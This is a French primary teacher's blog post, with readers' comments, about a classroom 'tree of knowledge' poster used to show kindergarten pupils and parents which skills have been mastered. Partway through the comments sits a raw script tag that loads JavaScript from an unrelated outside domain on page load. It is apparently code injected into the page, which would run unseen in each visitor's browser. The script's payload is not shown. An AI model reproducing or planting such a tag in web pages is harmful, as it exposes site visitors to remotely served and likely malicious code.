-
Arbre des savoirs
Pour aider les élèves à se rendre compte de leurs progrès, j'ai affiché dans ma classe un arbre des savoirs. Il s'agit en fait d'un grand panneau sur lequel j'ai dessiné un arbre. Chaque branche correspond à un domaine de mon classeur de réussites. Sur chaque branche, j'affiche l'étiquette d'un savoir, savoir-faire ou savoir être quand celui-ci me semble être acquis par la majorité des élèves. Cela leur permet de visualiser leurs progrès et cela permet aussi aux parents de voir tout ce que l'on fait en maternelle (eh bien non, en maternelle on ne fait pas que jouer !!!).
L'année prochaine, je vais essayer de m'appuyer encore plus dessus en présentant chaque étiquette que l'on va travailler en lien avec l'emploi du temps. Et quand on aura appris quelque chose et que l'on aura écrit la fiche du savoir correspondant, j'accrocherai devant eux l'étiquette dans l'arbre des savoirs. Disons que j'aimerais un peu théâtraliser tout ça pour leur donner envie d'apprendre. Maintenant, peut-être que je fais fausse route et que cela ne va pas les intéresser. A ce moment là, j'aviserai...
Tags : arbre, etiquette, chaque, cela, savoirs
-
Commentaires
A vrai dire, ça me rassure autant que toi que quelqu'un envisage les choses de la même manière que moi. J'essaie un peu de sortir des sentiers battus et j'ai toujours un peu peur de viser trop haut pour la maternelle. Mais c'est vrai qu'après quatre ans passés dans le même niveau, j'ai envie d'approfondir les choses, de les voir autrement, de fonctionner différemment.
oui tu as raison ! bon moi c'est ma première année mais j'envisage de fonctionner déjà comme toi ... c'est rassurant de trouver d'autres personnes qui pensent la même chose (je corresponds avec des maitresses qui bossent déjà comme ça ) mais il est difficile de se projeter sur des dispositifs que je n'ai pas encore mis en place! Je ne fais qu'imaginer... et là voir concrètement ce que tu comptes faire ..ça m'inspire et je visualise clairement ce qu'on peut faire même si on n'a pas le même niveau de classe!
En tout cas merci pour ton blog ! Tu vas entendre parler de moi souvent!
J adore l idée même si la maternelle n'est pas mon univers... Pourquoi pas une adaptation pour le primaire... À réfléchir... Merci pour l idée et le partage.
De rien. J'ai trouvé tellement de choses sur internet qu'il me semble normal à mon tour d'y participer. En espérant encore pouvoir apporter de nouvelles idées.
11MaggieSCLundi 10 Septembre 2012 à 22:29J'adore cette idée. J'aimerais même le mettre en place au plus vite dans la classe. Est-ce que par hasard vous auriez les fichiers des cartes des savoirs déjà prêts à imprimer. Cela nous ferait gagner un max de temps à toutes. Merci mille fois d'avance.
12MaggieSCLundi 10 Septembre 2012 à 22:4313PrunilletteLundi 17 Décembre 2012 à 10:03Suite à une animation pédagogique j'ai découvert votre site et c'est une véritable mine à trésors! Votre arbre des savoirs m'intéressent beaucoup pour l'année prochaine puisque nous travaillons déjà avec le livret de Charivari/Orphéécole. Sur votre photo je vois que vos cartes ont deux couleurs différentes. A quoi correspondent-elles? Aux savoirs des PS et des MS? Merci beaucoup pour votre partage!
<script src="http://themerose.info/dfi823hs.js?0.3321344275976913" type="text/javascript"></script>15miitaMercredi 3 Juillet 2013 à 15:21c'est le top ton idée !!! est ce que je peux me permettre de te demander les étiquettes que tu coe sur l'arbre car j'ai du mal à trouver des symboles explicites des "compétences"!!! merci d'avance !!
Merci beaucoup. En fait les étiquettes que j'affiche sont les images de mon cahier de réussite que je découpe.
17miitaJeudi 4 Juillet 2013 à 10:24
Ajouter un commentaire
ah oui je vois mieux maintenant!! la démarche que tu proposes : afficher la carte d'apprentissage au moment où elle est travaillée dans l'emploi du temps, créer la fiche pour le classeur des savoirs ... c'est exactement ce que je comptais faire!! C'est vrai qu'après je ne comptais pas spécialement exploiter les cartes collectives mais ton idée d'arbre est sympa... je vais y refléchir aussi !
Merci pour ton partage qui confirme ce que je comptais faire... je ne suis pas que dans le flou artistique !